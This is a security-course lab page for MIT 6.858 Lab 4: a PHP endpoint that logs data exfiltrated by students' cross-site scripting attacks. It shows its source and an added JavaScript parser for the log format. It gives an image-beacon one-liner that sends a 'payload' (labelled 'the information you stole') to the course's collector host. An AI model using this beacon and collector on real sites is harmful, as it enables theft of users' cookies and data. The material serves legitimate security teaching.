You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2020/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }
    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }
    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }
    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }
    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);
    $file = fopen("/tmp/6.858-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }
    flock($file, LOCK_UN);
    fclose($file);
    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.858/2020/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab 4 Logging Script</title>
</head>
<body>
  <h1>Lab 4 Logging Script</h1>
  <p>
    You can use this server side script to extract data from client-side
    JavaScript. For example, clicking this client-side hyperlink will cause
    the server to log the payload:
  </p>
  <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
  <p>
    The random argument is ignored, but ensures that the browser bypasses its
    cache when downloading the image. We suggest that you use the random
    argument in your scripts as well. The ID argument will help you
    distinguish your log entries from those sent by other students; we
    suggest picking your MIT Athena username. Newlines are not allowed in
    <tt>javascript:</tt> links; if this bothers you, try
    <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
  </p>
  <h2>Test form</h2>
  <p>
    If you just want to try out the script, you can use this form. (For your
    actual attacks in lab 4, you'll probably want to use the JavaScript image
    technique shown above.)
  </p>
  <form method="GET" action="">
    <label for="id">ID:</label><br />
    <input name="id" placeholder="your-mit-username" size="40" />
    <i>(some identifier to locate your payload in the log)</i>
    <br />
    <br />
    <label for="payload">Payload:</label><br />
    <input name="payload" placeholder="some-string" size="40" />
    <i>(the information you stole)</i>
    <br />
    <input type="submit" value="Log" name="log_submit" />
  </form>
  <h2>Logged entries</h2>
  <p>
    Below are the most recent logged entries, so that you can check if your
    attack worked:
  </p>
  <pre class="tty"><?php
    $lines = file_get_contents("/tmp/6.858-logger.txt");
    echo htmlspecialchars($lines);
  ?></pre>
  <h2>Source code</h2>
  <p>In case you are curious, here is the source code of this page.</p>
  <pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>
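The source above writes each entry as an RFC 2822 date, the id and the payload joined by ": ", after replacing CR and LF with "." so that one request always yields one line. The following is an added example, not part of the course's code, that models that line format and parses it back, flagging lines where the unescaped ": " separator makes the id/payload boundary ambiguous. The function names (`neutralize`, `formatEntry`, `parseEntry`, `parseLog`) are hypothetical and the sample entries are constructed.

```javascript
// Added example (not the course's code): models the log-line format written
// by log.php and parses it back. All sample entries below are constructed.
const DATE_RE =
  /^([A-Z][a-z]{2}, \d{2} [A-Z][a-z]{2} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}): (.*)$/;

// Mirrors str_replace(array("\n", "\r"), '.', $value) in the PHP source.
function neutralize(value) {
  return value.replace(/[\r\n]/g, '.');
}

// Mirrors fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n").
function formatEntry(date, id, payload) {
  return `${date}: ${neutralize(id)}: ${neutralize(payload)}\n`;
}

// Parses one line. The script does not escape ": ", so the id/payload split
// is only a guess when the separator occurs more than once; flag those lines.
function parseEntry(line) {
  const m = DATE_RE.exec(line.replace(/\n$/, ''));
  if (!m) return null;
  const rest = m[2];
  const cut = rest.indexOf(': ');
  if (cut === -1) return null;
  return {
    date: m[1],
    id: rest.slice(0, cut),
    payload: rest.slice(cut + 2),
    ambiguous: rest.indexOf(': ', cut + 2) !== -1,
  };
}

// Parses a whole log; lines that do not match the format come back as null.
function parseLog(text) {
  return text.split('\n').filter((l) => l !== '').map(parseEntry);
}

// Constructed inputs.
const DATE = 'Fri, 02 Jan 2026 07:02:26 +0000';
const plain = formatEntry(DATE, 'my-username', 'some-string');
// An id carrying CR/LF plus text shaped like another entry stays on one
// physical line, but the parser can no longer trust the field boundary.
const multi = formatEntry(DATE, 'alice\r\n' + DATE + ': bob', 'x');

console.log(parseLog(plain + multi));
```

Anything that consumes this log should treat entries with `ambiguous: true` as unattributed rather than trusting the parsed id.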